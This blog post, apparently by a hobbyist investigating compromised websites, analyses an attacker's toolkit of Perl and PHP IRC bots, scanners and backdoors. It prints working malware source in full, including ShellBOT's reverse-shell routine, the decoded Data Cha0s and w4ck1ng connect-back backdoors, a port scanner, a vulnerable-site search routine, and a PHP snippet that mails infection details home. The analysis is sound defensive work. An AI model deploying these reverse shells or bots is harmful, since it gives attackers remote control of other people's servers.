What is in use here is a collection of scripts by varying authors from multiple nationalities in different languages.  This in a best case scenario is a script kiddie, also by the fact that he left his gmail address in the script that was tied back to a friendster account and facebook account.  Would it be fun to friend him? Yea it would be, is it the smartest thing to do? Maybe not.  I sure would like to talk to this person and maybe get some idea of what the motivation is of the actions, or just make some more links in the community he moves in.

This was worth doing, the sites that I reported to be infected to their owners have been cleaned and it was a lot of fun!

I followed it back for a bit and this is what I ended up with.

sub se_yahoo {
  my ($chan,$key,$nf) = @_;

sub s_engine {
    my ($f,$se,$type,$chan,$bug,$dork,$ef) = @_;

sub s_cari {
  #Type: 1 = Cari saja, 2 = Cari dan eksploit, 3 = Cari dan eksploit Joomla
  my ($chan,$dork,$nf,$bug,$type) = @_;

sub s_scanz {
  my ($to,$bug,$dork,$sb,$type,$autodom) = @_;

if    (($com =~ /^scan\s+(.+?[=])\s+(.*)/) && (fork() == 0))  { s_scanz($dtarget,$1,$2,$hb,1,1); exit;  }

So it will search for what ever is the second mach group in what is supplied.
There is also some other subs in here that are worth mentioning.

One uses a site http://md5.rednoize.com/ to try and find md5 sums.

Another does a geolocation lookup of the machine compromised from what I could tell.

$filebotscan = "scan.txt";

It’s full of all sorts of stuff nothing really caught my attention until I reached this.

##[ GOOGLE ]##
sub se_google {
  my ($chan,$key,$nf) = @_;
  my @daftar;
  my $num = 50; my $max = 5000; my $p = 0;
  #my $url = "http://localhost/search/google.co.id.htm";
  my $url = "http://www.google.com/search?num=".$num."&q=".$key."&start=".$p."&sa=N";
  my $murl = "http://www.google.com";
  my $nxurl;
  my $q = bukasitus($url);
  if ( $q !~ /2010 Google/ ) { msge($chan,"Google","Baned!!"); msge($chan,"Google bypas:",$bypass."key=".$key); @daftar = se_gbypass($chan,$key,$nf); }
  if ( $q =~ /dari sekitar <b>(.+?)<\/b>/ ) {
    my $h = $1; $h =~ s/,//g; msgt($chan,"Google","$h");
  }
  if ( $q =~ /class=b><a href=\"(.*?)\">/ ) {
      my $nxurl = $1; if ($conf{showdbse} == 1){msgn($dbgchan,"Google","$nxurl");}
  }
  while ( $q =~ m/<h3 class=r><a href=\"http:\/\/(.*?)\"/g ) { push (@daftar, $1); }
  for ($p=50;$p<=$max;$p+=$num) {
    $nxurl = "http://www.google.co.id/search?num=".$num."&hl=id&q=".$key."&start=".$p."&sa=N";
    $q = bukasitus($nxurl);
    while ( $q =~ m/<h3 class=r><a href=\"http:\/\/(.*?)\"/g ) {  push (@daftar, $1);  }
    if ( $q !~ /<h3 class=r><a href=\"http:\/\/(.*?)\"/ ) { return @daftar;  }
  }
  return @daftar;
}

I wonder what this is doing? A little further down it has a section to get around getting banned from google for launching too many searches.

There is also many other search engines being used, but why?

What ever is being returned to @daftar is going into this guy.

sub lnk_sortir {
  my @unik = ();
  my %ada  = ();
  foreach my $e ( @_ ) {
    next if $ada{ $e }++;
    push (@unik, $e);
  }
  return @unik;
}

So this is returning the unique results of what ever is being given to it.

Time to take a closer look at that first sub, and what it’s putting into @daftar.

while ( $q =~ m/<h3 class=r><a href=\"http:\/\/(.*?)\"/g ) {  push (@daftar, $1);  }

That makes it easy, its pulling out URL’s of sites. But what are we looking for to get that list?

 if ($funcarg =~ /^portscan (.*)/) {
             my $hostip="$1";
             my @portas=("21","22","23","25","53","59","79","80","110","113","135","139","443","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
             my (@aberta, %porta_banner);
             foreach my $porta (@portas)  {
                my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
                if ($scansock) {
                   push (@aberta, $porta);
                   $scansock->close;
                }
             }

We can do some port scans and grab some banners

Here is the section for the connect back, /bin/sh or cmd.exe.

            # Conback.pl by Dominus Vis adaptada e adicionado suporte pra windows ;p
            elsif ($funcarg =~ /^conback\s+(.*)\s+(\d+)/) {
              my $host = "$1";
              my $porta = "$2";
              sendraw($IRC_cur_socket, "PRIVMSG $printl :02Conectando-se em02: $host:$porta");
              my $proto = getprotobyname('tcp');
              my $iaddr = inet_aton($host);
              my $paddr = sockaddr_in($porta, $iaddr);
              my $shell = "/bin/sh -i";
              if ($^O eq "MSWin32") {
                $shell = "cmd.exe";
              }
              socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
              connect(SOCKET, $paddr) or die "connect: $!";
              open(STDIN, ">&SOCKET");
              open(STDOUT, ">&SOCKET");
              open(STDERR, ">&SOCKET");
              system("$shell");
              close(STDIN);
              close(STDOUT);
              close(STDERR);
            }

This is handy.

           elsif ($funcarg =~ /^info/) {
           my $sysos = `uname -sr`;
           my $uptime = `uptime`;
           if ( $sysos =~ /freebsd/i ) {
           $sysname = `hostname`;
           $memory = `expr \`cat /var/run/dmesg.boot | grep "real memory" | cut -f5 -d" "\` \/ 1048576`;
           $swap = `$toploc | grep -i swap | cut -f2 -d" " | cut -f1 -d"M"`;
           chomp($memory);
           chomp($swap);
           }
           elsif ( $sysos =~ /linux/i ) {
           $sysname = `hostname -f`;
           $memory = `free -m |grep -i mem | awk '{print \$2}'`;
           $swap = `free -m |grep -i swap | awk '{print \$2}'`;
           chomp($swap);
           chomp($memory);
           }
           else {
           $sysname ="Not Found";;
           $memory ="Not found";
           $swap ="Not Found";
           }
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C15--- ^C3[^C01 SysInfo ^C3] ^C15-------------");
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01os/host^C15^B;^B^C01 $sysos - $sysname ");
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01proc/PID^C15^B;^B^C01 $processo - $$");
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01uptime^C15^B;^B^C01 $uptime");
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01memory/swap^C15^B;^B^C01 $memory - $swap");
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01perl/bot^C15^B;^B^C01 $] - $VERSAO");
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C15--- ^C3[^C01 /SysInfo ^C3] ^C15------------");
           }

my $line_temp;
while( 1 ) {
     while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
     delete($irc_servers{''}) if (defined($irc_servers{''}));
     &DCC::connections;
     my @ready = $sel_cliente->can_read(0.6);
     next unless(@ready);

     foreach $fh (@ready) {
          $IRC_cur_socket = $fh;
          $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
          $nread = sysread($fh, $msg, 4096);
          if ($nread == 0) {
               $sel_cliente->remove($fh);
               $fh->close;
               delete($irc_servers{$fh});
          }
          @lines = split (/\n/, $msg);

          for(my $c=0; $c<= $#lines; $c++) {
               $line = $lines[$c];
               $line=$line_temp.$line if ($line_temp);
               $line_temp='';
               $line =~ s/\r$//;
               unless ($c == $#lines) {
                    parse("$line");
               } else {
                    if ($#lines == 0) {
                         parse("$line");
                    } elsif ($lines[$c] =~ /\r$/) {
                         parse("$line");
                    } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
                         parse("$line");
                    } else {
                         $line_temp = $line;
                    }
               }
          }
      }
 }

This is the main chunk of the script, the first ‘while(1)’ just keeps it going in the loop.

The next while loop is ‘while (!(keys(%irc_servers))) { conectar(“$nick”, “$servidor”, “$porta”); }’ , this is a while loop that ensures that it’s connected to an irc server. The ! is a negation and will call the conectar sub and login. It will keep running this going through the list of IRC servers until successful.

The rest of this simplified is a foreach loop that goes through the connected servers and pulls back the text and passes it off to the ‘parse’ sub that pulls out what to do with the commands.

Next is;

$filebotperl = "iso.txt";

I love comments, at least we don’t have to guess what this is for.

#!/usr/bin/perl
#
#  ShellBOT by: devil__
#       Greetz: Puna, Kelserific
# Comandos:
#           @oldpack <ip> <bytes> <tempo>;
#           @udp <ip> <porta> <tempo>;
#           @fullportscan <ip> <porta inicial> <porta final>;
#           @conback <ip> <porta>
#           @download <url> <arquivo a ser salvo>;
#           !estatisticas <on/off>;
#           !sair para finalizar o bot;
#           !novonick para trocar o nick do bot por um novo aleatorio;
#           !entra <canal> <tempo>
#           !sai <canal> <tempo>;
#           !pacotes <on/off>
#           @info
#           @xpl <kernel>
#           @sendmail <assunto> <remetente> <destinatario> <conteudo>
########## CONFIGURACAO ############

my @ps = ("/usr/local/apache/bin/httpd -DSSL","/sbin/syslogd","[eth0]","/sbin/klogd -c 1 -x -x","/usr/sbin/acpid","/usr/sbin/cron","");
my $processo = $ps[rand scalar @ps];

$servidor='irc.shell2k.com' unless $servidor;
my $porta='6667';
my @canais=("#megaturks");
my @adms=("CaLLDeRooN");

# Anti Flood ( 6/3 Recomendado )
my $linas_max=10;
my $sleep=5;

my $nick = getnick();
my $ircname = getident2();
my $realname = "uname -n";
#chop (my $realname = `uname -n`);

my $acessoshell = 1;
######## Stealth ShellBot ##########
my $prefixo = "!all";
my $estatisticas = 0;
my $pacotes = 1;
####################################

my $VERSAO = '0.3b';

$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';

There is a lot to go through on this, but this part looks like it’s getting ready to make an IRC connection.

#####################
# Stealth Shellbot  #
#####################

sub getnick {
  return "Exbot".int(rand(1000));
}

sub getident2 {
        my $length=shift;
        $length = 3 if ($length < 3);

        my @chars=('a'..'z','A'..'Z','1'..'9');
        foreach (1..$length)
        {
                $randomstring.=$chars[rand @chars];
        }
        return $randomstring;
}

#############################
#  B0tchZ na veia ehehe    #
#############################

This section is  connecting to the IRC server,

$sel_cliente = IO::Select->new();
sub sendraw {
  if ($#_ == '1') {
    my $socket = $_[0];
    print $socket "$_[1]\n";
  } else {
      print $IRC_cur_socket "$_[0]\n";
  }
}

sub conectar {
   my $meunick = $_[0];
   my $servidor_con = $_[1];
   my $porta_con = $_[2];

   my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
   if (defined($IRC_socket)) {
     $IRC_cur_socket = $IRC_socket;

     $IRC_socket->autoflush(1);
     $sel_cliente->add($IRC_socket);

     $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
     $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
     $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
     $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
     nick("$meunick");
     sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
     print "\nShellBot $VERSAO by: deviL__\n";
     print "nick: $nick\n";
     print "servidor: $servidor\n\n";
     sleep 2;
   }

}

$filebotphp  = "bot.txt";

This looks pretty specific to the irc bot, but there is something encoded again just like in the other scripts.

$dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1ZbMV0pIHsNCiAgJHBvcnQgPSAkQVJHVlsxXTsNCn0NCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0Kc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KfQ0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik7DQogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow0KICBleGl0KDApOw0KfQ0KcHJpbnQgIlsqXSBEYXRhY2hlZFxuXG4iOw==";
#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
  printf "Usage: $0 [Host] <Port>\n";
  exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
  $port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
  die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
  open(STDIN,">&SERVER");
  open(STDOUT,">&SERVER");
  open(STDERR,">&SERVER");
  exec {'/bin/sh'} '-bash' . "" x 4;
  exit(0);
}
print "[*] Datached\n\n";

Ta-da, another script that gives shell access.

It appears that this script writes the encoded information to a file in the /tmp/ dir called dc.pl (/tmp/dc.pl).

We also have some information on another irc server and channel.

class pBot
{
 var $config = array("server"=>"irc.xxxxx.com",
                     "port"=>"6667",
                     "pass"=>"xxxxxxx",
                     "prefix"=>"xxxx",
                     "maxrand"=>"15",
                     "chan"=>"#xxxxxx",
                     "chan2"=>"",
                     "key"=>"",
                     "modes"=>"+p",
                     "password"=>"xxxxx",
                     "trigger"=>".",
                     "hostauth"=>"*" // * for any hostname (remember: /setvhost xxxx.xxx)
                     );
 var $users = array();
 function start()

There is a few sub’s in this file to look at but nothing that is groundbreaking or any fun for that matter.

The next item is def.txt, there is not a whole lot in there beside the defacement message, so we are going to move on.

The next item is a tar.gz, psy.tar.gz.  Let’s unpack it and look around.

It’s from a project called psyBNC, from the readme file it’s all about keeping a connection to IRC, I can imagine why this would be in here, but nothing really else we can do with it. Other then noting it appears to be from 2006.

The next item is eggdrop.tar.gz.

Well that’s nice, it appears to be the source code of the IRC bot. You can see the project page here.

http://www.eggheads.org/

$shell_data = "$visitcount = $HTTP_COOKIE_VARS["visits"];
if( $visitcount == "") {
     $visitcount = 0;
     $visitor = $_SERVER["REMOTE_ADDR"];
     $web = $_SERVER["HTTP_HOST"];
     $inj = $_SERVER["REQUEST_URI"];
     $target = rawurldecode($web.$inj);
     $body = "Boss, there was an injected target on $target by $visitor";
     @mail("xxxxxx@gmail.com","Fx29Shell http://$target by $visitor", "$body");
     } else {
     $visitcount;
     }
     setcookie("visits",$visitcount);"

Good to know it phones home.

Well there is a few more places that mention that address, and what’s really interesting is that this guy appears to have his account on freindster.

http://profiles.friendster.com/xxxxxx

I am pretty certian that this is the guy, but it would not be nice to share this information. Kinda odd that he would use his real email address, maybe it’s an old one that he forgot was on freindster and out on the internets.

Humm, it also has another email address on his profile, it has a facebook account!

http://facebook.com/XXXXXXXX

Well that awesome, but what do you do with it?

(And there is a reason I did not post the links)

The first one we found was back_connect_pl.

IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiOyc7DQokc3lzdGVtMT0gJ2VjaG8gImBpZGAiOyc7DQokc3lzdGVtMj0gJ2VjaG8gImBwd2RgIjsnOw0KJHN5c3RlbTM9ICdlY2hvICJgd2hvYW1pYEBgaG9zdG5hbWVgOn4gPiI7JzsNCiRzeXN0ZW00PSAnL2Jpbi9zaCc7DQokMD0kY21kOw0KJHRhcmdldD0kQVJHVlswXTsNCiRwb3J0PSRBUkdWWzFdOw0KJGlhZGRyPWluZXRfYXRvbigkdGFyZ2V0KSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHByb3RvPWdldHByb3RvYnluYW1lKCd0Y3AnKTsNCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCm9wZW4oU1RESU4sICI
back_connect_pl = #!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";';
$system1= 'echo "`id`";';
$system2= 'echo "`pwd`";';
$system3= 'echo "`whoami`@`hostname`:~ >";';
$system4= '/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
print "\n\n:: w4ck1ng-shell (Private Build v0.3) reverse shell ::\n\n";
print "\nSystem Info: ";
system($system);
print "\nYour ID: ";
system($system1);
print "\nCurrent Directory: ";
system($system2);
print "\n";
system($system3); system($system4);
close(STDIN);
close(STDOUT);
close(STDERR);

That looks like part of some command web portal, will have to check into that one later.  Next up was back_connect_c, I am guess that this is some sort of binary.

Yup,

back_connect_c = CC: (GNU) 3.4.5 20051201 (Red Hat 3.4.5-2)GCC: (GNU) 3.4.5 20051201 (Red Hat 3.4.5-2)GCC: (GNU) 3.4.5 20051201 (Red Hat 3.4.5-2)GCC: (GNU) 3.4.5 20051201 (Red Hat 3.4.5-2)GCC: (GNU) 3.4.5 20051201 (Red Hat 3.4.5-2)GCC: (GNU) 3.4.5 20051201 (Red Hat 3.4.5-2).symtab.strtab.shstrtab.interp.note.ABI-tag.hash.dynsym.dynstr.gnu.version.gnu.version_r.rel.dyn.rel.plt.init.text.fini.rodata.eh_frame.ctors.dtors.jcr.dynamic.got.got.plt.data.bss.commen#

The last one in that group was $backdoor.

f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAoIUECDQAAAD4EgAAAAAAADQAIAAHACgAIgAfAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIrAkAAKwJAAAFAAAAABAAAAEAAACsCQAArJkECKyZBAg0AQAAOAEAAAYAAAAAEAAAAgAAAMAJAADAmQQIwJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAAAAAAABEAAAATAAAAAAAAAAAAAAAQAAAAEQAAAAAAAAAAAAAACQAAAAgAAAAFAAAAAwAAAA0AAAAAAAAAAAAAAA8AAAAKAAAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAABAAAAAAAAAAcAAAALAAAAAAAAAAQAAAAMAAAADgAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC4AAAAAAAAAdQEAABIAAACgAAAAAAAAAHEAAAASAAAANAAAAAAAAADMAAAAEgAAAGoAAAAAAAAAWgAAABIAAABMAAAAAAAAAHgAAAASAAAAYwAAAAAAAAA5AAAAEgAAAFgAAAAAAAAAOQAAABIAAACOAAAAAAAAAOYAAAASAAAAOwAAAAAAAAA6AAAAEgAAAFMAAAAAAAAAOQAAABIAAAB1AAAAAAAAALkAAAASAAAAegAAAAAAAAArAAAAEgAAAEcAAAAAAAAAeAAAABIAAABvAAAAAAAAAA4AAAASAAAAfwAAAEiJBAgEAAAAEQAOAEAAAAAAAAAAOQAAABIAAAABAAAAAAAAAAAAAAAgAAAAFQAAAAAAAAAAAAAAIAAAAABfSnZfUmVnaXN0ZXJDbGFzc2VzAF9fZ21vbl9zdGFydF9fAGxpYmMuc28uNgBleGVjbABwZXJyb3IAZHVwMgBzb2NrZXQAc2VuZABhY2NlcHQAYmluZABzZXRzb2Nrb3B0AGxpc3RlbgBmb3JrAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABfX2xpYmNfc3RhcnRfbWFpbgBjbG9zZQBHTElCQ18yLjAAAAACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAQACAAAAAAAAAAEAAQAkAAAAEAAAAAAAAAAQaWkNAAACAKYAAAAAAAAAiJoECAYSAACYmgQIBwEAAJyaBAgHAgAAoJoECAcDAACkmgQIBwQAAKiaBAgHBQAArJoECAcGAACwmgQIBwcAALSaBAgHCAAAuJoECAcJAAC8mgQIBwoAAMCaBAgHCwAAxJoECAcMAADImgQIBw0AAMyaBAgHDgAA0JoECAcQAABVieWD7AjoMQEAAOiDAQAA6FsEAADJwwD
$back_door = "CC: (GNU) 3.4.6 (Ubuntu 3.4.6-1ubuntu2)GCC: (GNU) 3.4.6 (Ubuntu 3.4.6-1ubuntu2)GCC: (GNU) 4.0.3 (Ubuntu 4.0.3-1ubuntu5)GCC: (GNU) 4.0.3 (Ubuntu 4.0.3-1ubuntu5)GCC: (GNU) 3.4.6 (Ubuntu 3.4.6-1ubuntu2)GCC: (GNU) 4.0.3 (Ubuntu 4.0.3-1ubuntu5)GCC: (GNU) 3.4.6 (Ubuntu 3.4.6-1ubuntu2)?"

Another binary.